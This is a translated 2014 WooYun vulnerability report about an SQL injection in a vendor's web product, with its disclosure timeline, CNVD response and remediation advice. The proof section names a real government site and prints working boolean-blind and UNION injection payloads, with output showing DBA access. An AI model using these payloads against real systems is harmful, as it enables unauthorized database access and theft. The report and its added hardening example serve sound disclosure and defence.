
Vulnerability summary

Defect ID: wooyun-2014-059986

Title: A software company's product contains a generic SQL injection vulnerability (DBA privileges)

Related vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2014-05-09 16:10

Fixed: 2014-08-07 16:12

Published: 2014-08-07 16:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-05-09: Details sent to the vendor, awaiting vendor handling
2014-05-12: Vendor confirmed; details disclosed to the vendor only
2014-05-15: Details opened to third-party security partners
2014-07-06: Details disclosed to core white hats and domain experts
2014-07-16: Details disclosed to regular white hats
2014-07-26: Details disclosed to intern white hats
2014-08-07: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

Google search term: 利梭网络
The injection point is the id parameter; the affected URLs are listed below:

Proof of vulnerability:

http://www.xxssfj.gov.cn/

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1003' AND 4805=4805 AND 'JVIW'='JVIW
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: id=1003' UNION ALL SELECT CONCAT(0x7165666171,0x69505559437473675171,0x71686b6e71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5
current user is DBA: True


tables:

available databases [194]:

Fix:

The id parameter is numeric.
Fix: when receiving the id parameter, force-cast it to an integer before using it.
int id = Integer.parseInt(request.getParameter("id")); // cast id to an integer before it reaches the database query; the servlet-style request.getParameter is assumed here, since parsing the literal string "id" (as originally written) would always throw NumberFormatException
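As an added example (not code from the report or from the vendor's product), the vulnerable concatenation pattern that the boolean-based payload above exploits, next to a hardened version written for the PHP/MySQL stack identified in the proof; the table and column names and the mysqli connection are assumptions.

```php
<?php
// Added example, not the vendor's code. The `info` table and its columns are assumed.

// Vulnerable pattern: id is spliced into a quoted literal, so a value such as
// 1003' AND 4805=4805 AND 'JVIW'='JVIW becomes part of the WHERE clause.
function build_info_query_vulnerable($id) {
    return "SELECT title, content FROM info WHERE id='" . $id . "'";
}

// Hardened step 1: accept only a positive integer; anything else is rejected
// before any SQL is built (the report's fix, expressed in PHP).
function parse_id($raw) {
    $id = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    return ($id === false) ? null : $id;
}

// Hardened step 2: even with a validated integer, bind it as a parameter so the
// value can never be interpreted as SQL if the query is later changed.
function fetch_info(mysqli $db, $raw_id) {
    $id = parse_id($raw_id);
    if ($id === null) {
        return null; // caller should respond with 400/404 instead of querying
    }
    $stmt = $db->prepare("SELECT title, content FROM info WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($title, $content);
    $row = $stmt->fetch() ? array('title' => $title, 'content' => $content) : null;
    $stmt->close();
    return $row;
}

// Validator check without a database: a normal id passes, the report's payload is rejected.
$constructed_inputs = array('1003', "1003' AND 4805=4805 AND 'JVIW'='JVIW", '-1', '12abc');
foreach ($constructed_inputs as $raw) {
    $verdict = (parse_id($raw) === null) ? 'rejected' : 'accepted';
    echo str_pad($verdict, 9) . var_export($raw, true) . PHP_EOL;
}
?>
```

The proof also shows "current user is DBA: True", so alongside the parameter fix the application should connect with a least-privilege database account restricted to its own schema, which limits what any remaining injection can reach.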

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2014-05-12 18:51

Vendor reply:

CNVD confirmed and reproduced the described situation, and CNVD has notified the software vendor through public contact channels.

Latest status:

None yet